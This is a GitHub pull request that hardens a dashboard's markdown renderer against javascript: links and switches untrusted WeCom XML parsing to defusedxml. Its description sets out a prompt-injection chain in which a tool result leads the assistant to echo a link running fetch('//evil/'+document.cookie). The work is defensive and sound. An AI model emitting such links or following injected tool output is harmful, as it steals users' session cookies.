harden(dashboard,wecom): restrict markdown link schemes; safe-parse untrusted XML#32442
Merged
Conversation
…sedxml Two small defensive-hardening changes: - web/src/components/Markdown.tsx: render links only for http(s)/mailto schemes; other schemes (javascript:, data:, vbscript:) are dropped to plain text so a crafted link in rendered content can't execute on click. - gateway/platforms/wecom_callback.py: parse the untrusted, pre-auth WeCom callback request body with defusedxml instead of xml.etree, blocking entity-expansion / billion-laughs (and XXE) on the parse path. defusedxml is already a dependency (uv.lock); response-building XML in wecom_crypto.py is unchanged (it is not parsed from untrusted input). Verified: dashboard typechecks and builds; defusedxml blocks an entity-expansion payload while valid WeCom envelopes still parse.
Follow-up on top of @TheOnlyMika's #32155 cherry-pick. The defusedxml hardening import was unconditional, which would break the gateway for anyone running a WeComCallback adapter without the (transitive-only) defusedxml present. - Wrap the import in the same try/except pattern as aiohttp/httpx in the same file. Sets DEFUSEDXML_AVAILABLE flag. - Extend check_wecom_callback_requirements() to gate on the flag, so the gateway logs the actual missing dep and skips the adapter instead of crashing. - Add [wecom] extra to pyproject.toml with defusedxml==0.7.1. - Register platform.wecom_callback in tools/lazy_deps.py so users get prompted to install it on first WeComCallback configuration, same pattern as discord/slack/matrix. defusedxml is still the right call for pre-auth XML parsing — this commit just makes the dep declarative and recoverable instead of a hard import-time crash.
Contributor
🔎 Lint report:
|
| Rule | Count |
|---|---|
unresolved-attribute |
1 |
unresolved-import |
1 |
First entries
gateway/platforms/wecom_callback.py:341: [unresolved-attribute] unresolved-attribute: Attribute `fromstring` is not defined on `None` in union `Unknown | None`
gateway/platforms/wecom_callback.py:25: [unresolved-import] unresolved-import: Cannot resolve imported module `defusedxml.ElementTree`
✅ Fixed issues: none
Unchanged: 4953 pre-existing issues carried over.
Diagnostics are surfaced as warnings — this check never fails the build.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
Salvage of #32155 (@TheOnlyMika) plus a follow-up commit making the new dependency declarative.
What it fixes
Dashboard XSS via LLM markdown (
web/src/components/Markdown.tsx):The inline renderer rendered link hrefs verbatim into
<a href>.SessionsPage.tsxfeedsmsg.content(tool output, assistant output — attacker-influenceable via prompt injection, compromised tool, hostile MCP response) into<Markdown>. Concrete chain: malicious tool result → assistant echoes[Click](javascript:fetch('//evil/'+document.cookie))→ user clicks → script runs in dashboard origin with full session/API access.XXE / billion-laughs on WeCom callback (
gateway/platforms/wecom_callback.py):xml.etree.ElementTree.fromstringwas called on the raw, pre-auth WeCom POST body in_decrypt_requestand_build_event. Entity expansion fires before signature verification of the inner Encrypt blob.Mechanism
/^(https?:|mailto:)/i.test(href.trim())allowlist. Other schemes (javascript:,data:,vbscript:,file:,blob:) and HTML-entity-encoded variants are dropped to plain text. Verified against: case-mixed, leading whitespace/BOM/ZWSP/SOH, percent-encoded — all blocked.defusedxml.ElementTree as ETis a drop-in forfromstring. defusedxml refuses entity declarations entirely (verified: billion-laughs and XXE both raiseEntitiesForbidden).Follow-up commit (chore)
The original PR hard-imports
defusedxmlat module top, which would crash any gateway running WeComCallback on installs that don't transitively pull defusedxml. The chore commit:try/exceptwith aDEFUSEDXML_AVAILABLEflag, matching the file's existing aiohttp/httpx patterncheck_wecom_callback_requirements()on the flag so the gateway logs and skips the adapter instead of crashing[wecom]extra topyproject.toml(defusedxml==0.7.1)platform.wecom_callbackintools/lazy_deps.pyso users get prompted to install it on first WeComCallback configuration, same pattern as discord/slack/matrixuv.lockValidation
tests/gateway/test_wecom_callback.py+tests/gateway/test_wecom.py)tsc --noEmitclean acrossweb/EntitiesForbidden; legit XML still parses;check_wecom_callback_requirements()correctly returns True with the dep, False withoutCloses #32155.